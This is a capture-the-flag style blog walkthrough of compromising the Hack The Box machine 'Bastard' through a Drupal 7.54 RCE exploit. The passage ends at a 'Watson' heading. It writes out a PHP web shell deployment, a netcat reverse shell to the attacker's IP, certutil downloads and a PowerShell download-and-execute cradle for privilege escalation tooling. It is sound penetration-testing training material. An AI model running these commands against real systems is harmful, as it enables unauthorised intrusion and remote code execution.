Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Because change sucks, we’ll start with our same old nMap scan: nmap -sV 10.10.10.9
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-49.png)
So three ports open, let’s see if we can get a little more info but just on the three ports we found: nmap -p 80,134,49154 -A 10.10.10.9
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-50-1024x617.png)
It looks like Drupal 7 is running behind port 80. We can also see that there is a CHANGELOG.txt file, so let’s navigate to that by bringing up our browser.
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-51.png)
Drupal 7.54 is the exact version we’re working with. Cool cool. Let’s see if there’s anything in Searchsploit for that: searchsploit drupal 7
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-52.png)
Glancing through this there appears to be a Remote code execution vulnerability for different variants of Drupal 7
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-53.png)
Let’s copy that guy to our current directory and take a look at it: cp /usr/share/exploitdb/exploits/php/webapps/41564.php ./exploit.php
Before executing it, we need to read more about it. A little bit of Googling found this article: https://www.ambionics.io/blog/drupal-services-module-rce
It’s a long article, but it’s informative. It looks like within the exploit there are three values we need to update:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-57.png)
The URL is easy enough, that’s the IP of our target. The endpoint path and endpoint we’ll need to enumerate. Back to Gobuster: gobuster dir -u http://10.10.10.9 –wordlist=/usr/share/wordlists/dirb/big.txt -s 200,301,302 -o bastard.go –timeout 30s
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-56.png)
We can see in the GoBuster results that there is a /rest location, so we’ll add that to our script. We also need to update the file in our script. The default code in there creates a file called dixuSOspsOUU.php and puts a web shell in it, but it’s not one I’m super familiar with. I guess we can give it a shot….so we’ll leave it alone for now.
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-58.png)
Thus when it’s all updated it looks like this:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-59.png)
When I tried running the script initially with php exploit.php I was informed there were two #’s missing on line 16 and line 71 for comments. Now, let’s run it again:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-60-1024x236.png)
It looks like I’m missing the php-curl package. Let’s install it right quick with apt-get install php-curl
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-61.png)
And I still get a damn error. So Googling happened. In the php.ini file located in /etc/php/7.3/apache2/php.ini and enabled curl by removing the ; in front of it:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-62.png)
And that still didn’t work..same error. So when I did php -m I didn’t see curl…..
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-63.png)
I knew that I had PHP version 7.3 because that’s what showed up when I typed php –version So I removed it: sudo apt-get purge php7.3
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-64.png)
Which left me with PHP 7.4 and the curl module showing up:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-65.png)
And this time when I did php exploit.php it appears to have created the necessary files:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-66.png)
Now, when I navigate to the page I couldn’t get the RCE to work….
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-67.png)
So I copied my existing file, named it exploit.php and changed the shell
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-68.png)
Re-ran that:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-69.png)
Then navigated to http://10.10.10.9/exploit.php?cmd=dir to see what we got:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-70-1024x206.png)
Well that’s some form of success. Now, let’s see if we can get a shell with NetCat.
Windows doesn’t have NetCat installed by default so we’ll have to setup a SMB server on our Kali box. Let’s start with getting nc.exe in the right place:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-71.png)
We’ll start our smb server with the following command impacket-smbserver smb smb
Then let’s try to copy nc.exe from our browser to our Windows target machine with the following: http://10.10.10.9/exploit.php?cmd=copy \\10.10.14.18\smb\nc.exe nc.exe
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-72.png)
Now, we’ll start our NetCat listner on our Kali box:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-73.png)
Then we’ll use our browser to establish our NetCat connection: http://10.10.10.9/exploit.php?cmd=nc.exe 10.10.14.18 1234 -e cmd.exe
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-74.png)
Priv Esc
We’ll start with a look at systeminfo
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-75.png)
The main thing that stands out here is that we’ve got a Windows Server 2008 R2 machine, that’s 64 bit. Further enumeration showed there aren’t any patches to it. I think we’ll try WinPEAS to further enumerate, but we have to get it on our Windows box first.
WinPEAS can be downloaded here; https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe
I downloaded it and put it in my working folder that I used earlier to get NetCat. Now, we’re going to use certutil to pull it over. I navigated to C:\inetpub\drupal-7.54 so I could copy the file here since I didn’t have write access to C:\Windows\Temp or the user’s desktop (where the user.txt flag is).
Now, let’s get the file: certutil -urlcache -f http://10.10.14.18/winPEASx64.exe winpeas.exe
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-79.png)
Success. Now let’s run it: ./winpeas.exe
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-80.png)
Sum bitch…. WinPEAS also comes as a .bat, so let’s download that off github right quick and pull it over the same way we just did.
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-81-1024x123.png)
And I’ll save you a bunch of time and troubleshooting..couldn’t get WinPEAS to execute on the Windows box. I kept getting a ‘is not recognized as an internal or external command, operable program or batch file’. So on to PowerUp.
PowerUp
I’ve used PowerUp beffore on Chatterbox, so let’s give it a shot again. I just copied it from my Chatterbox directory, but you can also get it from here: https://github.com/PowerShellMafia/PowerSploit
Now, we’ll copy it over to our Windows target machine: certutil -urlcache -f http://10.10.14.18/PowerUp.ps1 PowerUp.ps1
Copied it over..and tried to run it…same damn error….
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-82.png)
So..I tweaked some stuff after doing some research. For starters, I added Invoke-AllChecks to the bottom of the PowerUp.ps1 script. PowerUp is meant to run in PowerShell Empire and the Invoke-AllChecks is started automatically when you run it with Empire. Invoke-AllChecks loads all the functions of the script. So when we add it to the end of our script it’ll do that load for us.
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-83.png)
Then, I went back to using the browser and running commands from there. So from here, we’ll pull PowerUp.ps1 from our Kali box and then load it in the browser: http://10.10.10.9/exploit.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString(“http://10.10.14.18/PowerUp.ps1”) | powershell -noprofile –
It’s going to take a few moments to run, but once it’s finished you should see something like this:
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-85-1024x280.png)
And because that’s super hard to read let’s right click on it and view selection source.
And nothing in here is super helpful….
![](https://thecyberjedi.com/wp-content/uploads/2020/07/image-86.png)
Watson